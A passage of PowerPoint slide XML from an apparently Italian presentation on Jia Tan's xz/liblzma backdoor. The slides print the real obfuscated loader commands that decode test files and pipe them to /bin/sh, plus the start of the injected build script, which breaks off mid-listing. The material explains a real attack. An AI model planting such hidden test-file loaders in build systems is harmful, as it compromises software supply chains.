            <a:r>
              <a:rPr lang="it-IT" sz="1000" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>large_compressed.lzma</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>| </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>eval</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t> $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>i|tail</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t> -c </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>+31233</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>| </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>tr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Segoe UI"/>
                <a:cs typeface="Segoe UI"/>
              </a:rPr>
              <a:t>"\114-\321\322-\377\35-\47\14-\34\0-\13\50-\113"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t> "\0-\377"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>)| </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>xz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t> -F </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>raw</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t> --lzma1 -dc|/bin/sh</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="it-IT" sz="1000">
                <a:latin typeface="Consolas"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="it-IT" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>####World####</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT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415533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F2AFF39-6F5A-1E50-7CDE-8AAD21C2B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167" y="3300"/>
            <a:ext cx="10524738" cy="1452552"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="bg2"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="4000"/>
              <a:t> La strategia di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="4000" err="1"/>
              <a:t>jia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="4000"/>
              <a:t> tan</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT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A698C9B-A4EA-4166-BB4E-5F2D0E1F8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AFF03-0A74-4B45-B900-A104A13AD368}" type="datetime1">
              <a:rPr lang="it-IT"/>
              <a:t>07/06/2024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B864F53-019D-926A-DB74-BA373E3FA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83DB1B8-299C-899A-BCC9-0785B184C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67</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="37" name="Segnaposto contenuto 36" descr="Immagine che contiene schizzo, diagramma, pixel&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6400CFC6-8C27-B738-B0F7-BEBC02B5C7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433" y="7285"/>
            <a:ext cx="1676961" cy="1453403"/>
          </a:xfr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C584BB4A-FACA-4161-5F39-9ECB562902C0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="138548" y="1927018"/>
            <a:ext cx="11864247" cy="31700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800" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Stage 1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT" sz="2800" b="1">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT" sz="2400">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT" sz="2400">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Il binario risultante dalla precedente operazione viene decompresso.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Da qui si ottiene un file molto lungo che Andres Freund allega alla mailing list col nome di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" i="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>injected.txt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>. Nelle prossime slide ci sono degli </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>snippet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Successivamente, quest'ultimo file viene eseguito con Shell.</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill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24780D70-F347-5610-235E-C66AB628A92C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="143565" y="2515152"/>
            <a:ext cx="11979411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000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>    [...]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>    (head -c +1024 &gt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>dev</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>null</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>) &amp;&amp; head -c </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>+939</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>)";</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="it-IT" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="it-IT" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>xz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t> -dc $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>srcdir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>tests</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>/files/good-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>large_compressed.lzma</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>| </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>eval</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t> $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>i|tail</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t> -c </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>+31233</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>| </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>tr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI"/>
                <a:cs typeface="Segoe UI"/>
              </a:rPr>
              <a:t>"\114-\321\322-\377\35-\47\14-\34\0-\13\50-\113"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t> "\0-\377")</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>| </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>xz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t> -F </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>raw</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t> --lzma1 -dc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>|/bin/sh</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="it-IT" sz="1000">
                <a:latin typeface="Consolas"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="it-IT" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>####World####</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT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815024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F2AFF39-6F5A-1E50-7CDE-8AAD21C2B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167" y="3300"/>
            <a:ext cx="10524738" cy="1452552"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="bg2"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="4000"/>
              <a:t> La strategia di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="4000" err="1"/>
              <a:t>jia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="4000"/>
              <a:t> tan</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT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A698C9B-A4EA-4166-BB4E-5F2D0E1F8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AFF03-0A74-4B45-B900-A104A13AD368}" type="datetime1">
              <a:rPr lang="it-IT"/>
              <a:t>07/06/2024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B864F53-019D-926A-DB74-BA373E3FA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83DB1B8-299C-899A-BCC9-0785B184C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68</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="37" name="Segnaposto contenuto 36" descr="Immagine che contiene schizzo, diagramma, pixel&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6400CFC6-8C27-B738-B0F7-BEBC02B5C7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433" y="7285"/>
            <a:ext cx="1676961" cy="1453403"/>
          </a:xfr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24780D70-F347-5610-235E-C66AB628A92C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="107706" y="1717293"/>
            <a:ext cx="11979411" cy="443198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600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>1 P="-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>fPIC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t> -DPIC -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>fno-lto</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>ffunction-sections</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>fdata-sections"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>
2 C="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>pic_flag=\" $P\""</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>
3 O="^</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>pic_flag</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>=\" -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>fPIC -DPIC\"$"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>
4 R="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>is_arch_extension_supported"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>
5 x="__</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>get_cpuid("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>
6 p="good-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>large_compressed.lzma"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>
7 U="bad-3-corrupt_lzma2.xz"
8 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>eval</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t> $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>zrKcVq</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>
9 if test -f </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>config.status</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>then</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>
10 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>eval</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t> $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>zrKcSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>
11 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>eval</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t> `</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>grep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t> ^LD=\'\/ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>config.status`</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>
12 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="600" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
